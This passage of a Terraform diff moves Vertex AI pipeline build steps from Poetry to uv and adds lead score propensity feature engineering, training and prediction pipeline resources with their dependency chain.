-266,7 +315,7 @@ resource "google_artifact_registry_repository" "pipelines_docker_repo" { repository_id = local.artifact_registry_vars.pipelines_docker_repo.name description = "Docker Images Repository" # The format is Docker images. - format = "DOCKER" + format = "DOCKER" } locals { @@ -308,13 +357,12 @@ resource "null_resource" "build_push_pipelines_components_image" { docker_repo_id = google_artifact_registry_repository.pipelines_docker_repo.id docker_repo_create_time = google_artifact_registry_repository.pipelines_docker_repo.create_time source_content_hash = local.component_image_content_hash - poetry_installed = var.poetry_installed } # The provisioner block specifies the command that will be executed to build and push the base component image. # This command will execute the build-push function in the base_component_image module, which will build and push the base component image to the specified Docker repository. provisioner "local-exec" { - command = "${var.poetry_run_alias} python -m base_component_image.build-push -c ${local.config_file_path_relative_python_run_dir}" + command = "${var.uv_run_alias} python -m base_component_image.build-push -c ${local.config_file_path_relative_python_run_dir}" working_dir = self.triggers.working_dir } } @@ -350,6 +398,31 @@ resource "null_resource" "check_pipeline_docker_image_pushed" { ## Feature Engineering Pipelines ####### +# This resource is used to compile and upload the Vertex AI pipeline for feature engineering - lead score propensity use case +resource "null_resource" "compile_feature_engineering_lead_score_propensity_pipeline" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + pipelines_repo_id = google_artifact_registry_repository.pipelines-repo.id + pipelines_repo_create_time = google_artifact_registry_repository.pipelines-repo.create_time + source_content_hash = local.pipelines_content_hash + upstream_resource_dependency = null_resource.check_pipeline_docker_image_pushed.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. + # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-lead-score-propensity.execution -o fe_lead_score_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_lead_score_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-lead-score-propensity.execution -i fe_lead_score_propensity.yaml + EOT + working_dir = self.triggers.working_dir + } +} + + # This resource is used to compile and upload the Vertex AI pipeline for feature engineering - auto audience segmentation use case resource "null_resource" "compile_feature_engineering_auto_audience_segmentation_pipeline" { triggers = { @@ -358,7 +431,7 @@ resource "null_resource" "compile_feature_engineering_auto_audience_segmentation pipelines_repo_id = google_artifact_registry_repository.pipelines-repo.id pipelines_repo_create_time = google_artifact_registry_repository.pipelines-repo.create_time source_content_hash = local.pipelines_content_hash - upstream_resource_dependency = null_resource.build_push_pipelines_components_image.id + upstream_resource_dependency = null_resource.compile_feature_engineering_lead_score_propensity_pipeline.id } # The provisioner block specifies the command that will be executed to compile and upload the pipeline. @@ -366,9 +439,9 @@ resource "null_resource" "compile_feature_engineering_auto_audience_segmentation # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -o fe_auto_audience_segmentation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_auto_audience_segmentation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -i fe_auto_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -o fe_auto_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_auto_audience_segmentation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-auto-audience-segmentation.execution -i fe_auto_audience_segmentation.yaml EOT working_dir = self.triggers.working_dir } @@ -390,9 +463,9 @@ resource "null_resource" "compile_feature_engineering_aggregated_value_based_bid # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -o fe_agg_vbb.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_agg_vbb.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -i fe_agg_vbb.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -o fe_agg_vbb.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_agg_vbb.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-aggregated-value-based-bidding.execution -i fe_agg_vbb.yaml EOT working_dir = self.triggers.working_dir } @@ -414,9 +487,9 @@ resource "null_resource" "compile_feature_engineering_audience_segmentation_pipe # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -o fe_audience_segmentation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_audience_segmentation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -i fe_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -o fe_audience_segmentation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_audience_segmentation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-audience-segmentation.execution -i fe_audience_segmentation.yaml EOT working_dir = self.triggers.working_dir } @@ -438,9 +511,9 @@ resource "null_resource" "compile_feature_engineering_purchase_propensity_pipeli # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -o fe_purchase_propensity.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_purchase_propensity.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -i fe_purchase_propensity.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -o fe_purchase_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_purchase_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-purchase-propensity.execution -i fe_purchase_propensity.yaml EOT working_dir = self.triggers.working_dir } @@ -462,9 +535,9 @@ resource "null_resource" "compile_feature_engineering_churn_propensity_pipeline" # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -o fe_churn_propensity.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_churn_propensity.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -i fe_churn_propensity.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -o fe_churn_propensity.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_churn_propensity.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-churn-propensity.execution -i fe_churn_propensity.yaml EOT working_dir = self.triggers.working_dir } @@ -486,9 +559,9 @@ resource "null_resource" "compile_feature_engineering_customer_lifetime_value_pi # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -o fe_customer_ltv.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_customer_ltv.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -i fe_customer_ltv.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -o fe_customer_ltv.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f fe_customer_ltv.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.feature-creation-customer-ltv.execution -i fe_customer_ltv.yaml EOT working_dir = self.triggers.working_dir } @@ -498,12 +571,54 @@ resource "null_resource" "compile_feature_engineering_customer_lifetime_value_pi ## Training and Inference Pipelines ### +# This resource is used to compile and upload the Vertex AI pipeline for training the propensity model - lead score propensity use case +resource "null_resource" "compile_lead_score_propensity_training_pipelines" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + upstream_resource_dependency = null_resource.compile_feature_engineering_customer_lifetime_value_pipeline.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. + # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.training -o lead_score_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f lead_score_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.training -i lead_score_propensity_training.yaml + EOT + working_dir = self.triggers.working_dir + } +} + +# This resource is used to compile and upload the Vertex AI pipeline for prediction using the propensity model - lead score propensity use case +resource "null_resource" "compile_lead_score_propensity_prediction_pipelines" { + triggers = { + working_dir = "${local.source_root_dir}/python" + tag = local.compile_pipelines_tag + upstream_resource_dependency = null_resource.compile_lead_score_propensity_training_pipelines.id + } + + # The provisioner block specifies the command that will be executed to compile and upload the pipeline. + # This command will execute the compiler function in the pipelines module, which will compile the pipeline YAML file, and the uploader function, + # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. + provisioner "local-exec" { + command = <<-EOT + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.prediction -o lead_score_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f lead_score_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.lead_score_propensity.prediction -i lead_score_propensity_prediction.yaml + EOT + working_dir = self.triggers.working_dir + } +} + # This resource is used to compile and upload the Vertex AI pipeline for training the propensity model - purchase propensity use case resource "null_resource" "compile_purchase_propensity_training_pipelines" { triggers = { working_dir = "${local.source_root_dir}/python" tag = local.compile_pipelines_tag - upstream_resource_dependency = null_resource.compile_feature_engineering_customer_lifetime_value_pipeline.id + upstream_resource_dependency = null_resource.compile_lead_score_propensity_prediction_pipelines.id } # The provisioner block specifies the command that will be executed to compile and upload the pipeline. @@ -511,9 +626,9 @@ resource "null_resource" "compile_purchase_propensity_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -o purchase_propensity_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -i purchase_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -o purchase_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.training -i purchase_propensity_training.yaml EOT working_dir = self.triggers.working_dir } @@ -532,9 +647,9 @@ resource "null_resource" "compile_purchase_propensity_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -o purchase_propensity_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -i purchase_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -o purchase_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f purchase_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.purchase_propensity.prediction -i purchase_propensity_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -553,9 +668,9 @@ resource "null_resource" "compile_propensity_clv_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -o propensity_clv_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f propensity_clv_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -i propensity_clv_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -o propensity_clv_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f propensity_clv_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.propensity_clv.training -i propensity_clv_training.yaml EOT working_dir = self.triggers.working_dir } @@ -574,9 +689,9 @@ resource "null_resource" "compile_clv_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -o clv_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -i clv_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -o clv_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.training -i clv_training.yaml EOT working_dir = self.triggers.working_dir } @@ -595,9 +710,9 @@ resource "null_resource" "compile_clv_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -o clv_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -i clv_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -o clv_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f clv_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.clv.prediction -i clv_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -616,9 +731,9 @@ resource "null_resource" "compile_segmentation_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -o segmentation_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -i segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -o segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.training -i segmentation_training.yaml EOT working_dir = self.triggers.working_dir } @@ -637,9 +752,9 @@ resource "null_resource" "compile_segmentation_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -o segmentation_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -i segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -o segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f segmentation_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.segmentation.prediction -i segmentation_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -658,9 +773,9 @@ resource "null_resource" "compile_auto_segmentation_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -o auto_segmentation_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -i auto_segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -o auto_segmentation_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.training -i auto_segmentation_training.yaml EOT working_dir = self.triggers.working_dir } @@ -679,9 +794,9 @@ resource "null_resource" "compile_auto_segmentation_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -o auto_segmentation_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -i auto_segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -o auto_segmentation_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f auto_segmentation_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.auto_segmentation.prediction -i auto_segmentation_prediction.yaml EOT working_dir = self.triggers.working_dir } @@ -700,9 +815,9 @@ resource "null_resource" "compile_value_based_bidding_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -o vbb_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -i vbb_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -o vbb_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.training -i vbb_training.yaml EOT working_dir = self.triggers.working_dir } @@ -721,9 +836,9 @@ resource "null_resource" "compile_value_based_bidding_explanation_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -o vbb_explanation.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_explanation.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -i vbb_explanation.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -o vbb_explanation.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f vbb_explanation.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.value_based_bidding.explanation -i vbb_explanation.yaml EOT working_dir = self.triggers.working_dir } @@ -742,9 +857,9 @@ resource "null_resource" "compile_churn_propensity_training_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -o churn_propensity_training.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_training.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -i churn_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -o churn_propensity_training.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_training.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.training -i churn_propensity_training.yaml EOT working_dir = self.triggers.working_dir } @@ -763,9 +878,9 @@ resource "null_resource" "compile_churn_propensity_prediction_pipelines" { # which will upload the pipeline YAML file to the specified Artifact Registry repository. The scheduler function will then schedule the pipeline to run on a regular basis. provisioner "local-exec" { command = <<-EOT - ${var.poetry_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -o churn_propensity_prediction.yaml - ${var.poetry_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_prediction.yaml -t ${self.triggers.tag} -t latest - ${var.poetry_run_alias} python -m pipelines.scheduler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -i churn_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.compiler -c ${local.config_file_path_relative_python_run_dir} -p vertex_ai.pipelines.churn_propensity.prediction -o churn_propensity_prediction.yaml + ${var.uv_run_alias} python -m pipelines.uploader -c ${local.config_file_path_relative_python_run_dir} -f churn_propensity_prediction.yaml -t ${self.triggers.tag} -t latest + ${var.uv_run_alias} python -m pipelines.scheduler 